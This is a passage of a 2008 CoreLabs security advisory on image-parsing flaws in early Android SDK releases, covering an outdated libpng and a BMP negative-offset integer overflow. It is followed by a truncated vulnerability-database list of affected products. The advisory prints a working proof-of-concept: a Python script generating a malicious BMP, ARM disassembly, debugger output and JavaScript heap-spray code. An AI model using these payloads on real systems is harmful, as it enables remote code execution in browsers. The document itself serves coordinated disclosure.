The Portable Network Graphics (PNG) is a bitmapped image format that employs lossless data compression [9]. PNG was created to improve upon and replace the GIF format as an image file format that does not require a patent license.
The library 'libsgl.so' used by Android's WebKit contains commonly used code to load graphic files, as libpng, giflib and others. The version inside libsgl.so distributed with Android SDK m3-rc37a and earlier versions include the string '"libpng version 1.2.8 - December 3, 2004"'. Source code inspection of the file '\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android project reveals that '"libpng version 1.2.7 - September 12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier versions vulnerable to the following known issues: ' CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269 '.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for device-independent bitmap), is an image file format used to store bitmap digital images, especially on Microsoft Windows and OS/2 operating systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header is parsed in the method 'BMP::readFromStream(Stream *, ImageDecoder::Mode)' inside the 'libsgl.so' library. When the value of the 'offset' field of the BMP file header is negative and the Bitmap Information section (DIB header) specifies an image of 8 bits per pixel (8 bpp) the parser will try to allocate a palette, and will use the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white ('0x00ffffff') but with a carefully chosen negative offset it can be made to overwrite any address of the process with that value. Because the BMP decoder source wasn't released, a disassembly of the binary included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset .text:0002EE3C MOV R12, R7,LSL#2 .text:0002EE40 .text:0002EE40 loc_2EE40 .text:0002EE40 LDR R3, [R10,#0x10] .text:0002EE44 ADD LR, LR, #1 .text:0002EE48 MOVL R2, 0xFFFFFFFF .text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the same bug) but ranges 0x10000-0x20000 .text:0002EE50 MOV R0, #0 .text:0002EE54 CMP LR, R9 .text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1) .text:0002EE5C STRB R2, [R1,#2] .text:0002EE60 STRB R0, [R1,#3] .text:0002EE64 STRB R2, [R1,#1] .text:0002EE68 ADD R12, R12, #4 .text:0002EE6C BNE loc_2EE40 - -----------/
Now, if let's take a look at the memory map of the Android browser:
/-----------
ps
ps USER PID PPID VSIZE RSS WCHAN PC NAME root 1 0 248 64 c0084edc 0000ae2c S /init root 2 0 0 0 c0049168 00000000 S kthreadd ... root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb app_0 1574 535 83564 12832 ffffffff afe0c79c S com.google.android.browser root 1600 587 840 324 00000000 afe0bfbc R ps
cat /proc/1574/maps
cat /proc/1574/maps 00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process 0000a000-00c73000 rwxp 0000a000 00:00 0 [heap] 08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted) ...
- -----------/
We can see that the heap is located in the range '0000a000-00c73000' and it is executable. Overwriting this area will allow to redirect execution flow if there is a virtual table stored in the heap. Later on the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object .text:0002EB68 MOV R0, R8 .text:0002EB6C MOV LR, PC .text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10 - -----------/
Because the "Stream" Object (R8) is stored on the heap and we can fill the heap with the white color ' 0x00ffffff' we can load the Program Counter with the value at '0xffffff+0x10'. The following python script will generate a BMP to accomplish that:
/-----------
This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
Alfredo Ortega - Core Security
import struct
offset = 0xffef0000 width = 0x0bffff height=8
bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00" bmp+=struct.pack("<I",offset) bmp+="\x28\x00\x00\x00" bmp+=struct.pack("<I",width) bmp+=struct.pack("<I",height) bmp+="\x03\x00\x08\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff" bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41" bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" open("badbmp.bmp","wb").write(bmp) - -----------/
Opening the BMP file generated with this script inside a HTML page will cause (sometimes, as it is dependent on an uninitialized variable) the following output of the gdb debugger:
/-----------
(gdb) attach 1574 attach 1574 Attaching to program: /system/bin/app_process, process 1574 ... 0xafe0d204 in __futex_wait () from /system/lib/libc.so (gdb) c Continuing.
Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () (gdb) - -----------/
Here the browser process has jumped to the '0x00000000' address because that is the value at 0x00ffffff+0x10. We can change this value using common JavaScript heap-filling techniques.
The complete exploit page follows:
/-----------
// Fill 0x200000 - 0xa00000 with Breakpoints var nop = unescape("%u0001%uef9f"); while (nop.length <= 0x100000/2) nop += nop; var i = 0; for (i = 0;i<5;i++) document.write(nop) // Fill 0xa00000 - 0x1100000 with address 0x00400040 var nop = unescape("%u4000%u4000"); while (nop.length <= 0x100000/2) nop += nop; var i = 0; for (i = 0;i<2;i++) document.write(nop)
- -----------/
Because the exploit needs to fill over 16 MB of heap memory to reach the address '0xffffff' it is very slow and the default memory configuration of Android will often abort the process before reaching the desired point. To overcome this limitation for demonstration purposes one can launch the emulator with this parameters:
'emulator -qemu -m 192'
That will launch the Android emulator with 192 megabytes of memory, plenty for the exploit to work.
This security bug affects Android SDK m5-rc14 and earlier versions.
Report Timeline
. 2008-01-30: Vendor is notified that possibly exploitable vulnerabilities where discovered and that an advisory draft is available. This affects Android SDK m3-rc37a and earlier versions. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to generate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for the open source community, but agree they can fix the problem on the estimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a vulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new findings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found will be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core receives no notification. 2008-02-13: Core sends the vendor more malformed images, including GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory, including a BMP PoC that runs arbitrary ARM code and informs the vendor that we noticed that the recent m5-rc14 release fixed the GIF and PNG bugs. Publication of CORE-2008-0124 has been re-=scheduled for February 27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been released and provides an official statement to the "Vendor Section" of the advisory. A final review of the advisory is requested before its release. The vendor indicates that the Android SDK is still in development and stabilization won't happen until it gets closer to Alpha. Changes to fix the BMP issue are coming soon, priorities are given to issues listed in the public issue tracking system at http://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has been moved to March 3rd 2008, asks if an estimated date for the BMP fix is available and if Core should file the reported and any future bugs in the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to the vendor as requested. Core requests for any additional comments or statements to be provided by noon March 3rd, 2008 (UTC-5) . 2008-03-01: Vendor requests publication to be delayed one day in order to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP vulnerability. Vendor indicates that Android applications run with the credentials of an unprivileged user which decreases the severity of the issues found . 2008-03-04: Further research by Alfredo Ortega reveals that although the vendor statement is correct current versions of Android SDK ship with a passwordless root account. Unprivileged users with shell access can simply use the 'su' program to gain privileges . 2008-03-04: Advisory CORE-2008-0124 is published.
References
[1] Android Overview - Open Handset Alliance - http://www.openhandsetalliance.com/android_overview.html [2] "Android Comes to Life in Barcelona" - The Washington Post , February 11th, 2008 - http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html [3] Android Developer Challenge - http://code.google.com/android/adc.html [4] "Test Center Preview: Inside Google's Mobile future" - Inforworld, Feb. 27th 2008 - http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html [5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th, 2008 http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html [6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. Wiley; 2nd edition (August 20, 2007) - http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html [7] Graphics Interchange Format version 89a - http://www.w3.org/Graphics/GIF/spec-gif89a.txt [8] Android downloads page http://code.google.com/p/android/downloads/list [9] Portable Network Graphics (PNG) specification - http://www.w3.org/TR/PNG/ [10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
GPG/PGP Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I teV3ahcSAUFEtsaRCeXVuN8= =u35s -----END PGP SIGNATURE-----
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.7rc1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.5"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.7"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.12"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.11"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.9"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.6,
"vendor": "greg roelofs",
"version": "1.2.10"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "greg roelofs",
"version": "1.0.9"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "greg roelofs",
"version": "1.2.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "greg roelofs",
"version": "1.0.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "greg roelofs",
"version": "1.0.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "greg roelofs",
"version": "1.2.4"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "greg roelofs",
"version": "1.0.7"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "greg roelofs",
"version": "1.2.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 1.0,
"vendor": "greg roelofs",
"version": "1.2.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.8,
"vendor": "png group",
"version": "1.0.6 to 1.2.12 versions up to"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.2"
},
{
"_id": null,
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.2"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "2.0"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "2.1"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3.0"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3.0 (x86-64)"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "4.0"
},
{
"_id": null,
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "4.0 (x86-64)"
},
{
"_id": null,
"model": "turbolinux",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "10_f"
},
{
"_id": null,
"model": "turbolinux appliance server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "1.0 (hosting)"
},
{
"_id": null,
"model": "turbolinux appliance server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "1.0 (workgroup)"
},
{
"_id": null,
"model": "turbolinux appliance server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "2.0"
},
{
"_id": null,
"model": "turbolinux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "10"
},
{
"_id": null,
"model": "turbolinux fuji",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "turbolinux multimedia",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "turbolinux personal",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "10"
},
{
"_id": null,
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "10 (x64)"
},
{
"_id": null,
"model": "turbolinux server",
"scope": "eq",
"trust": 0.8,
"vendor": "turbo linux",
"version": "8"
},
{
"_id": null,
"model": "wizpy",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "home",
"scope": null,
"trust": 0.8,
"vendor": "turbo linux",
"version": null
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1 (ws)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (ws)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (as)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (es)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (ws)"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5 (server)"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3.0"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5.0 (client)"
},
{
"_id": null,
"model": "linux advanced workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "2.1"
},
{
"_id": null,
"model": "rhel desktop workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5 (client)"
},
{
"_id": null,
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "8.2"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2007.0"
},
{
"_id": null,
"model": "enterprise linux virtualization server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "1.0"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.12"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "multi network firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "2.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "5.10"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "5.10"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0x86"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "10.0"
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.11"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "rpath",
"version": "1"
},
{
"_id": null,
"model": "enterprise linux es ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "corporate server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "9.0"
},
{
"_id": null,
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "5.10"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2006.0"
},
{
"_id": null,
"model": "android software development kit m3-rc37a",
"scope": null,
"trust": 0.3,
"vendor": "google",
"version": null
},
{
"_id": null,
"model": "ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.18"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "5.10"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.10"
},
{
"_id": null,
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.3"
},
{
"_id": null,
"model": "open-enterprise-server",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"_id": null,
"model": "personal",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "linux professional",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"_id": null,
"model": "appliance server hosting edition",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "1.0"
},
{
"_id": null,
"model": "unitedlinux",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "1.0"
},
{
"_id": null,
"model": "ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.1"
},
{
"_id": null,
"model": "hat enterprise linux as",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "2.1"
},
{
"_id": null,
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "fuji",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "stable",
"scope": null,
"trust": 0.3,
"vendor": "openpkg",
"version": null
},
{
"_id": null,
"model": "libpng3",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.10"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "11.0"
},
{
"_id": null,
"model": "hat enterprise linux desktop client",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "5"
},
{
"_id": null,
"model": "operating system enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "trustix",
"version": "2.0"
},
{
"_id": null,
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "android software development kit m5-rc15",
"scope": "ne",
"trust": 0.3,
"vendor": "google",
"version": null
},
{
"_id": null,
"model": "messaging storage server mm3.0",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "enterprise linux hardware certification",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "messaging storage server",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "advanced workstation for the itanium processor ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "hat enterprise linux supplementary server",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "5"
},
{
"_id": null,
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.1"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.10"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "hat enterprise linux as ia64",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "2.1"
},
{
"_id": null,
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.3"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.10"
},
{
"_id": null,
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "10.1"
},
{
"_id": null,
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "appliance server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "2.0"
},
{
"_id": null,
"model": "ccs",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.10"
},
{
"_id": null,
"model": "secure linux",
"scope": "eq",
"trust": 0.3,
"vendor": "trustix",
"version": "2.2"
},
{
"_id": null,
"model": "e1.0-solid",
"scope": null,
"trust": 0.3,
"vendor": "openpkg",
"version": null
},
{
"_id": null,
"model": "linux professional oss",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "10.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "8.1"
},
{
"_id": null,
"model": "home",
"scope": null,
"trust": 0.3,
"vendor": "turbolinux",
"version": null
},
{
"_id": null,
"model": "fuji",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "0"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9"
},
{
"_id": null,
"model": "hat fedora core6",
"scope": null,
"trust": 0.3,
"vendor": "red",
"version": null
},
{
"_id": null,
"model": "hat enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "5"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "8"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2007.0"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"_id": null,
"model": "linux professional x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.3"
},
{
"_id": null,
"model": "secure linux",
"scope": "eq",
"trust": 0.3,
"vendor": "trustix",
"version": "3.0"
},
{
"_id": null,
"model": "suse linux retail solution",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "8.0"
},
{
"_id": null,
"model": "linux personal oss",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "10.0"
},
{
"_id": null,
"model": "linux enterprise desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "corporate server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "3.0"
},
{
"_id": null,
"model": "message networking",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "linux personal x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "9.1"
},
{
"_id": null,
"model": "linux professional",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "8.2"
},
{
"_id": null,
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "corporate server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"_id": null,
"model": "appliance server workgroup edition",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "1.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "10.1"
},
{
"_id": null,
"model": "messaging storage server mss",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "enterprise linux desktop version",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "10.2"
},
{
"_id": null,
"model": "linux professional",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.1"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "2.1"
},
{
"_id": null,
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"_id": null,
"model": "suse linux standard server",
"scope": "eq",
"trust": 0.3,
